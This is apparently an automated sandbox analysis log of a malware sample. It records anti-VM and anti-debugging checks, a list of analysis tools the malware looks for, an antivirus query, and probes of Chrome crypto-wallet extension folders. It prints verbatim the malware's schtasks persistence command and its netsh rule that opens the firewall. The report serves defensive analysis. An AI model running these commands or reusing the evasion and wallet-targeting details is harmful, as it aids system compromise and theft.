Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: FILEMON.EXE
Source: C:\5p9SnCM5jV\ybtrrus.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe API coverage: 2.6 %
Source: C:\temp333\install_2.dll API coverage: 6.3 %
Source: C:\5p9SnCM5jV\ybtrrus.exe API coverage: 0.6 %
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe TID: 1340 Thread sleep time: -60000s >= -30000s
Source: C:\5p9SnCM5jV\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\temp333\install_2.dll Code function: 2_2_6D371F00 CloseHandle,memset,FindFirstFileW,FindClose, 2_2_6D371F00
Source: C:\temp333\install_2.dll Code function: 2_2_6D3716F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError, 2_2_6D3716F0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError, 5_2_6CAAC2D0
Source: C:\temp333\install_2.dll Code function: 2_2_6D35EE1C GetSystemInfo,CreateFileMappingW,MapViewOfFile,VirtualAlloc,VirtualFree,UnmapViewOfFile,CloseHandle,CloseHandle, 2_2_6D35EE1C
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7330000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724781063.00000279C732E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.21.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.21.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.21.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724259278.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120699495.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724705097.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, install_2.dll Binary or memory string: Hyper-V RAW
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724259278.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120699495.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724705097.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C737B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.21.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.21.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340799261.00000279C737E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: install_2.dll, 00000002.00000002.3340085430.0000000000468000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2301910103.0000000000468000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2295263360.0000000000469000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2492012422.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491087856.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491302357.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491545059.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2493125053.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2302037944.0000000000468000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491754042.0000000000460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: 4HGFs
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J
Source: Amcache.hve.21.dr Binary or memory string: vmci.sys
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.21.dr Binary or memory string: \driver\vmci,\driver\pci
Source: ybtrrus.exe, 0000000E.00000003.2591527695.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0101a.zip.2.dr Binary or memory string: x3HgFs
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.21.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: Amcache.hve.21.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\5p9SnCM5jV\ybtrrus.exe API call chain: ExitProcess graph end node
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798409B0 free,IsDebuggerPresent,RaiseException, 0_2_00007FF7798409B0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D27E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_6D1D27E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D39BA00 GetProcessHeap,HeapAlloc, 2_2_6D39BA00
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779821180 Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,malloc,strlen,malloc,memcpy,_initterm, 0_2_00007FF779821180
Source: C:\temp333\install_2.dll Code function: 2_2_6D39599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6D39599F
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB9D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_6CAB9D73
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CABF0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_6CABF0D4
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAC13E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 5_2_6CAC13E1
Source: C:\temp333\install_2.dll Memory allocated: page read and write | page guard
Source: C:\temp333\install_2.dll Process created: C:\5p9SnCM5jV\ybtrrus.exe "C:\5p9SnCM5jV\ybtrrus.exe"
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ybtrrus.exe, 00000005.00000002.3372050029.0000000007696000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROGRAM MANAGERBOXOCR.EXE)
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program ManagerQ!i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager1#i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program ManagerQ$i
Source: ybtrrus.exe, 00000005.00000002.3374122205.00000000093BB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: )Program Managerboxocr.exe)WindowClass.0
Source: ybtrrus.exe, 00000005.00000002.3343611670.0000000005E5A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndStartU
Source: ybtrrus.exe, 00000005.00000002.3343611670.0000000005E5A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32U
Source: ybtrrus.exe, 00000005.00000002.3374122205.00000000093BB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager;X
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managera i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager!!i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: ybtrrus.exe, 00000005.00000002.3343611670.0000000005E5A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndU
Source: C:\temp333\install_2.dll Code function: 2_2_6D359920 cpuid 2_2_6D359920
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: GetLocaleInfoA, 5_2_6CAC2D4C
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: GetLocaleInfoA, 14_2_004144B0
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV\0101a.zip VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV\0101a_decrypted.zip VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77983D6C0 GetSystemTimeAsFileTime, 0_2_00007FF77983D6C0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAC070D InitializeCriticalSectionAndSpinCount,GetVersion, 5_2_6CAC070D

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: procmon.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: tcpview.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Wireshark.exe
Source: Amcache.hve.21.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: procexp.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: LordPE.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: autoruns.exe
Source: Amcache.hve.21.dr Binary or memory string: MsMpEng.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: ollydbg.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: regmon.exe
Source: C:\5p9SnCM5jV\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac
Source: C:\temp333\install_2.dll Code function: 2_2_6D37C9A0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_6D37C9A0